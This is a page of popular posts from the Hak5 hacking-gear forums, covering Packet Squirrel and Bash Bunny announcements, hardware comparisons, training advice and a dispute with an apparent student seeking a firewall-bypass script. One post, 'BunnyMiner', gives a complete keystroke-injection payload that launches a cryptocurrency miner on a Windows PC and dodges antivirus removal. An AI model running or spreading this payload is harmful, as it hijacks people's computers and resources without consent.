Jump to content
Hak5 Forums


Popular Content

Showing content with the highest reputation since 09/23/2017 in all areas

  1. 9 points
    I think we may do a pre-order next week leading up to the launch on Friday, but it wouldn't be publicized really. Just something special for us cool peeps on the forums & IRC.
  2. 6 points
  3. 6 points
    Just working on securing a venue for a Hak5 event in San Francisco mid October to introduce you all to our new furry friends. 🐿️🐿️🐿️
  4. 5 points
    Here's the official specs: Atheros AR9331 SoC at 400 MHz MIPS 16 MB Onboard Flash 64 MB DDR2 RAM 2x 10/100 Ethernet Port USB 2.0 Host Port 4-way payload select switch RGB Indicator LED Scriptable Push-Button Power: USB 5V 120mA average draw Dimensions: 50 x 39 x 16 mm Weight: 24 grams
  5. 5 points
    I do enjoy reading posts like this while having a coffee :) never fail to entertain. Makes me wonder if its one of you lot doing a windup :P
  6. 5 points
    Sample code! https://pastebin.com/aZyyS16w
  7. 5 points
    Currently working on a PoC - we'll see how well it works.
  8. 5 points
    Pre-orders would be filled day of release on the morning of the 20th. I'll update this thread early next week when it's ready -- I just need to coordinate with Sara and Jayson first to make sure this doesn't break anything =P
  9. 4 points
  10. 4 points
    The needle on the bullshit meter just flew off. Having worked and occasionally still work for school districts in the US, I can say that yes, the school can confiscate anything that a student uses on school property that damages the property. The network is school property.
  11. 4 points
    So sad to hear of the passing of Kerby...after so many years, I know how it feels. And Kerby loved to be on camera.... Darren, you have my greatest sympathy...
  12. 3 points
    Hey everyone, Version 1.4 of the Bash Bunny firmware is now available! With it comes an important fix which will prevent the device from boot-looping when an invalid update file is put onto the root of the Bash Bunny's storage partition. A bug in the Bash Bunny's QUACK command has also been fixed and all underlying packages have been updated. Find all the fixes and features in the changelog and bounce on by to BashBunny.com/downloads for your devious device download (\_/)
  13. 3 points
    You forgot NETMODE TRANSPARENT wget https://packetsquirrel.com BUTTON 1m && { echo "Discount unlocked!" LED FINISH } || { echo "Timeout dude!" LED FAIL }
  14. 3 points
    From the picture of: https://twitter.com/digininja It reads: The packet squirrel by Hak5 is a pocket sized Ethernet multi-tool for penetration testers and system administrators. Packet captures, MITM and remote access are made easy with its simple scripting language. online payload library and initiative interface. Flip the switch to desired payload, plug it in and get instant feedback from the multi-color LED.
  15. 3 points
    Soon-ish :-P Or one of my favorite things I did at DerbyCon 2016 booth...
  16. 3 points
    This was a very entertaining read. Thanks for the chuckle.
  17. 3 points
    By the way, does this look like a pentester, or some kids? https://twitter.com/jonbush1234 Where the profile pick for "Clarence" comes from. https://twitter.com/jonbush1234/status/914948133163061249 looks like maybe Mr "Clarence" needs help learning how to use his new rubber ducky. @Clarence will the real slim shady please stand up - https://www.twitch.tv/videos/173897157 After some digging, looks like he is 15yrs old, born in 2002. How long before a thread lock? I think he's suffered enough...
  18. 3 points
    This. Sorry, I don't believe for a moment that you aren't allowed to confiscate it. Schools are well within their rights to confiscate mobile phones, knives, and anything else them deem unsafe, inappropriate or a breach of their rules. The Rubber Ducky falls within this.
  19. 3 points
    They deliberately left out a part that said the students couldn't attack your network to make the job of a pen tester easier. Your first message sounded suspicious, this is now incompetent and suspicious.
  20. 3 points
    Confiscate the ducky and read the script.
  21. 3 points
    ::cracks knuckles:: Time to fire up Burp Suite.
  22. 3 points
    Yes. $0 if you're one of the first 100 at the party. $40-50 if you're not. There'll be other new devices too -- it's not just a Packet Squirrel launch party, it's en entire Hak5 Gear event ^_^
  23. 3 points
    Posting this to the community here first. Goes live in the morning 😉 https://hak5.org/rsvp Hope to see you in San Francisco - and if not IRL, soon after here ☺ 🐿️🐿️🐿️
  24. 2 points
    The Hak5 Gear Ethernet line consists of the Packet Squirrel and LAN Turtle (classic, SD, 3G). The LAN Turtle and Packet Squirrel are well suited for similar applications - remote access, man-in-the-middle attacks, packet sniffing, secure tunneling and network recon. Their biggest differences are their hardware (interfaces and appearance) and software (modules vs payloads). This affects how they are deployed, their stealth factors (for covert ops) and what actions are performed. Key Differences The LAN Turtle is best suited for long-term deployments at a client's facility to provide penetration testers with remote access to their network. Typically a social engineering operation is to plant a LAN Turtle on the target network with retrieval when the engagement has ended. Disguised as a USB Ethernet adapter, the LAN Turtle can provide this role uninterrupted. If remote access is guaranteed up front, the LAN Turtle (3G especially) can be shipped to the client site with simple instructions for deployment. The Packet Squirrel is an Ethernet multi-tool. It can provide a range of penetration testing functions, though it is equally suited for IT professionals and tech enthusiasts. The barrier to entry is lower since it relies on a simpler payload system of scripts. With the right scripts it can generally perform all of the functions of the LAN Turtle, however it is not as stealthy. Depending on how it is concealed it may not be as effective at long term deployments as the LAN Turtle. Applications Remote Access: Both are capable of providing encrypted remote access into a network. The LAN Turtle may be more stealth - disguised as a USB Ethernet adapter - and the 3G version bypasses perimeter defenses by bringing its own Internet backhaul. Man-in-the-Middle: The LAN Turtle can only perform MITM attacks against computers while the Packet Squirrel can be plugged inline between any two arbitrary Ethernet links (before computers, network printers, IP cameras and the like). Packet Sniffing: The Packet Squirrel is best suited at capturing packets to USB disks between any Ethernet segment using the built-in tcpdump payload. The LAN Turtle SD works similarly, logging to an internal MicroSD card - but only against a single computer. Secure Tunneling: Both devices can be used to secure network traffic, however the Packet Squirrel is better suited for this task using it's built-in openvpn payload. Only minimal configuration is required and any network device may benefit from it as a hardware VPN router. The LAN Turtle can perform this task, albeit only for a single computer using a module. Network Recon: Both devices are equally capable of performing network reconnaissance, e.g. nmap scans. Typically these scans are completed within a few minutes and do not require a large amount of storage. Currently (10-22-17) a nmap module is available for the LAN Turtle while a similar payload for Packet Squirrel is not. That said, a payload is expected soon and when it arrives the user experience will be easier, considering the Packet Squirrel's hardware. Software The LAN Turtle uses a module system while the Packet Squirrel uses a payload system. Both modules and payloads are free open source software add-ons contributed by the community and available from a central git repository. Modules are downloaded to the device "over the air" and come with their own interface for configuration. Setting up a module usually entails entering a few key pieces of data into a graphical user interface. Multiple modules may be enabled to run simultaneously when the device is deployed. Payloads are downloaded to the device manually, or via an updater app, in the form of one or more text files. Configuring a payload consists of editing the text file and changing values, typically at the beginning of the file. Multiple payloads may be carried and assigned to the various switch positions, however only one payload may run at once. Hardware Interfaces: The Packet Squirrel features two standard RJ45 Ethernet jacks and can therefore be installed inline between most any network segment. The LAN Turtle features one standard RJ45 Ethernet jack and one standard USB Type-A plug for power and USB Ethernet. Because of this it may be powered from any ordinary USB power source and connected to a network, however it can only be planted inline between a computer and network. Power: Both may be battery powered, but in the case of the LAN Turtle powering from a USB battery means that it is no longer suited for inline (MITM,Packet Sniffing) applications. Both have very low (~100-200 mA) power draw, so running off high capacity USB battery banks is a possibility. Feedback: The Packet Squirrel features an RGB LED for feedback. Its LED command is compatible with the Bash Bunny LED syntax, so standard payload states are easily distinguished. The LAN Turtle typically provides feedback to the penetration tester via software. E.g. the establishment of a SSH reverse shell. While it features two static programmable LED indicators, one yellow and one green, modules seldom take advantage of this hardware. Setup: The LAN Turtle has no special hardware for setup -- all modules are enabled or disabled in software. The Packet Squirrel provides a payload selection switch allowing the operator to choose the appropriate payload at runtime. Interaction: The Packet Squirrel provides a button for interaction with payloads. The LAN Turtle's button is not exposed to the user (inside case) and is only used for reset and recovery.
  25. 2 points
    It's a great companion to the USB attack tools, with the right payload. You'll see. Basically drop the Squirrel as a listener for an accompanying payload on the Duck/Bunny. Working on something special for that. Also, noted hardware request.
  26. 2 points
    I got you fam. Preshow: The main event: I was there. It was dope.
  27. 2 points
  28. 2 points
    Heh, made you look! 🤣😂🤣😂🤣😂
  29. 2 points
    https://github.com/michael-weinstein/veraT It gets the tumor and normal tissue DNA exomes and the tumor RNA. It extracts the patients HLA type (immune system markers) form the normal tissue DNA, finds the tumor-specific mutated proteins by comparing the tumor and normal DNA, and then looks at the RNA to figure out if the mutated proteins are likely being made. It then takes the mutated protein sequences and the HLA types and predicts which of these mutant proteins are going to be best presented to the immune system, which essentially gives the most immune-vulnerable changes in the cancer. Once that happens, we can try to target those things for an immune response.
  30. 2 points
  31. 2 points
    Its a script to test for the vuln not the attack script "Remember that this is not an attack script!" & "we are already releasing this code because the script got leaked"
  32. 2 points
    Interesting. If I can confirm this issue, we'll get it fixed and pushed out Friday.
  33. 2 points
    Kid, don't run any ducky scripts anybody gives you here. At this point, they're all going to be rm -rf / and fork bombs. Also, there's very little interesting stuff you can run on a chromebook that's not rooted and running... uh... not chromeOS.
  34. 2 points
    Ok. Who is "we"? Because "you" the pentester, aren't the one who secures the network(generally), you're the one who breaks and tests the network, then make recommendations on what to fix to the IT and Security team for the organization. If you are running iboss, and not "they" are running iboss, these are 2 different things. Who's in charge of the network? Are you the IT person who is implementing the network setup, part of the NOC/SOC, etc? What difference does it matter how it happened? Will recreating it change anything? Sure, helps when patching, but if there is a hole, find the hole, patch the hole. You're the "pentester", hired to find weaknesses in the system. If "we" set this up, then "we" should double check and test our setup. I'd bet money, there are probably multiple ways around this firewall restriction, so knowing how the student did it, is only one of them. If you are in fact the person in charge of the network, vs some outside contractor hired to break into and test the network, then you should have intimate knowledge of the firewall, the network topology, client and server machines, their setup configurations, permissions on the network, shares, etc, and where to start filtering and checking things, applying DNS and proxy filtering, vlans, etc. While it should be trivial in most cases with tunneling or VPN's to bypass most of this stuff on the firewall, if the kid is abusing the network, you DO NOT LET THE KID BACK ON THE NETWORK, and revoke their privileges. If any abuse of a network, even if not explicitly listed in student agreement/policy for "bypassing the firewall" as a rule, should surely have something that states privilege access granted, but not a right, and abuse of, can be taken away. As school staff for the IT team, even if just one person, you should have intimate knowledge of your perimeter and the network setup, and if you don't, there are probably way more pressing issues to fix, vs one kid bypassing the firewall. What is the network sign-in policy, how do they get access to the network, are they proxied natively so they can't access DNS and outside sites, what prevents anyone from plugging into the network with BYOD, rouge AP's, etc. Either this network is wide open, or you're not telling us the whole story, or as others said, total BS. This doesn't pass the smell test, and most pentesters, won't discuss client info on an open forum, as they probably have an NDA in most cases. Not saying it's 100% fabricated lie, sure, many schools have clueless network admins who are often at the mercy of the students, or just school staff/teachers/office personnel left to set this up, but if they can hire a "pen tester", they can surely hire a network admin and some IT people who know what is up with their network. You are either in over your head or should just come out and state you're trying to bypass the IBoss firewall.
  35. 2 points
    ... Stop. Just stop. You are paid to do a job, they don't have to pay you less due to leaving out part of an AUP. At this point I am convinced you are lying, and are a student trying to get around a firewall in your school by having us write a script for a USB Rubber Ducky for you.
  36. 2 points
    Really? So if a student breaches your schools security, and in such breaks the Acceptable Use Policy that you would have gotten them and their parent to sign, you cannot confiscate the equipment they used to do so, even if by their actions they could be breaking data protection laws? While I am not based in the US, and am not a lawyer, I do work with schools, and we have had similar attempts. I am EXTREMELY sceptical of your statements here...
  37. 2 points
  38. 2 points
    $40-50 for the packet squirrel? What about the other two? How much to get all three?
  39. 2 points
    Maybe relevant? https://depthsecurity.com/blog/unauthorized-flir-cloud-access
  40. 2 points
    BunnyMiner By Ar1k88 I'm going to "quietly" sneak this onto the thread... **** PLEASE DO NOT USE THIS ON OTHER PEOPLE'S PC'S! MYSELF, & MINERGATE DO NOT ENCOURAGE SUCH USE! **** Anyways, this is just a Simple CPU Miner from my Collection of Odd Scripts. And figured since this place doesn't cover this topic, I would try to do it myself. This is a SMALL NON-Silent CPU Miner, yes it can be made to be silent. The whole object of this post would be for demonstration purposes. I'll just post it and see what happens. :) payload.txt #!/bin/bash # # Title: USB CPU Miner # Author: Ar1k88 # Version: 1.1g # Target: Windows 7-10 # Category: Exploiting Resources # Sub-Category: Cryptocurrency # # I'm not promoting here. BUT since I do work for MinerGate (a HUGE Cryptocurrency Mining Pool) I am releasing # a Simple Non-Silent CPU Miner. Just to show that it is possible to mine Digital Currency with a USB. # # Please change the credentials in "config.txt" to this format: # <algorithim> # <pool stratum> # <username/wallet> # <cores/threads> # # Keep in mind this is just a Simple CPU Miner. I will leave the code here. You will need to go to # https://github.com/tpruvot/cpuminer-multi/releases/download/v1.3-multi/cpuminer-multi-rel1.3.zip # Extract the EXE's and use the x86 (32Bit) version due to it supports both 32Bit and 64Bit CPU # architectures. Add "cpuminer-x86.exe" and "msvcr120.dll" to the payload folder, and rename it to "2.exe". # Enjoy! -Ar1k88 # Grace-period for PC to recognize the BashBunny. Q DELAY 300 # Setting up and Attacking! CHARRRRGGGEEE!!! LED ATTACK # NOTE: Setting to Read-Only Storage to prevent Anti-virus's from removing binary files. (EXE's) ATTACKMODE HID RO_STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')" LED FINISH 1.cmd @echo Off cls REM This is to set easy to edit files for new users. Anyone who used a Console Miner would know what this is. REM -Ar1k88 SetLocal EnableDelayedExpansion Set n= Set ConfigFile=%~dp0\config.txt For /F "tokens=*" %%I IN (%ConfigFile%) DO ( Set /a n+=1 Set var!n!=%%I ) echo %var3% call %~dp0\2.exe -a %var1% -o %var2% -u %var3% -p x -t %var4% pause EndLocal @exit /B Config.txt is set up as following: <algorithm> <stratum> <email/wallet> <threads/cores> config.txt cryptonight stratum+tcp://aeon.pool.minergate.com:45550 [email protected] 2 Enjoy! P.S. - If you want to sign up to show this off to your friends or for work. Can easily create a account at MinerGate. http://bit.ly/MinerGateSignUp https://twitter.com/ar1k88 -Ar1k88
  41. 2 points
    If you don't have a background in Information Technology, ie: no formal training, at a minimum, get some basic classes in. If you truly know your networking and sysadmin stuff, then sure, take a gander at SANS and Offsec, but don't just jump in, if you don't have some sort of foundational grasp of things. Comptia Network+, Linux+(even an A+ class, but not required) and a basic windows MCP class, should be enough to grasp most things needed for the security side, but most people in penetration testing started on the LAN side or as System Administrators and networking backgrounds before going the other side. Not a requirement, but will make your life much easier before trying a pentesting course. Knowing TCP/IP basics, the OSI model, and some form of file sharing and network administration, ie: Active Directory, SMB/Samba, and Windows and Linux OS command line use, will greatly help you in the long run. Offsec's PWK, is more or less entry level pentesting, but I wouldn't consider it an easy course by any means. It's very foundational, and very instructional, but it's a 100% hands on, you need to physically do the task, to pass. Part video, part text instructional, you'll spend most of your times, in a VPN'ed virtual lab, performing real attacks against actual installed machines setup with real world vulnerabilities or mis-configurations, and all networked, like a real corporate network, allowing you to attack one machine and pivot through the network to others. SANS is also a really good class, but I wouldn't consider either theirs or offsec to be, hey, took the class, now I'm a pro. It will definitely build the mindset needed to be a pentester, and both will allow you to physically do the things you would in a pentest, SANS being a number of courses some of which may only be instructional and multiple choice questions, OSCP and other offsec courses are all hands-on, you have to perform actual hacking tasks, to pass, and no multiple choice questions. You also have to write an actual pentest report, which is a part of your passing grade as well, so don't just pass that part up, because it's what you would need to know and do well in the real world if doing the same thing for your job. If you have no background in any of the above I mentioned, start out gradually and build on the basics. Cybrary, Youtube, Google and Security Tub can help. Look into the following materials, which you don't have to take the vertifications, but can still read the books on the topics to get more well rounded: CompTIA Network+ CompTIA Linux+ CompTIA Security+ Microsft MCP books for MCSA/MCSE Setup a home lab with some virtual machines, setup a domain controller with windows server, an Active Directory domain, network some client computers to it, and try out some CTF's from places like Vulnhub or Hack The Box, as well as Pentester Academy. Then I'd work on PWk/OSCP and then maybe SANS.
  42. 2 points
    Yep, I've got a links page for each device, linked in the main "README.md". I'll add the Github Wiki for the Pineapple to the Pineapple's links page and add the Hak5 Github to the main README though, thanks.
  43. 2 points
    You could buy a cheap router that will take openwrt. Plug the wan side into your existing router and run WiFi and wired off openwrt instead. You'd then have a Linux box you could ssh to and use tools like tcpdump to watch traffic as you would be in the middle of everything.
  44. 2 points
    Question one: I can put whatever IP I want in a device, it doesn't have to use DHCP. An IP of with a netmask of and default gateway of may work fine on your network depending on the set up. Question two: you plugged into a switch, not a hub. You being in promiscuous mode means you see everything you are sent but the switch will only send you traffic meant for you which means your IP and broadcast traffic. What you are expecting is what you'd get off a hub or a span port.
  45. 2 points
    Why wipe the machine? If you created a new user, take ownership of the old account/files, and move their files over to the new profile, then nuke the old user profile. I actually do this for people when I fix their machines and they've broken their profile somehow. No need to reinstall everything unless you believe there is malware on it.
  46. 2 points
    @Darren Kitchen. Do we get any hints? We have been waiting for weeks to catch even the slightest details!!!
  47. 2 points
    The last I have heard is that more details will be available in early October. When / how is up to Darren :) I'd love to say more, but my hands are tied.
  48. 2 points
  49. 2 points
    Throw us a bone, @Sebkinne! :)
  50. 2 points
    Ahem... So does being mid Sept. constitute appeasing our endless anticipation with at least another hint? Can't blame a fellow for trying right...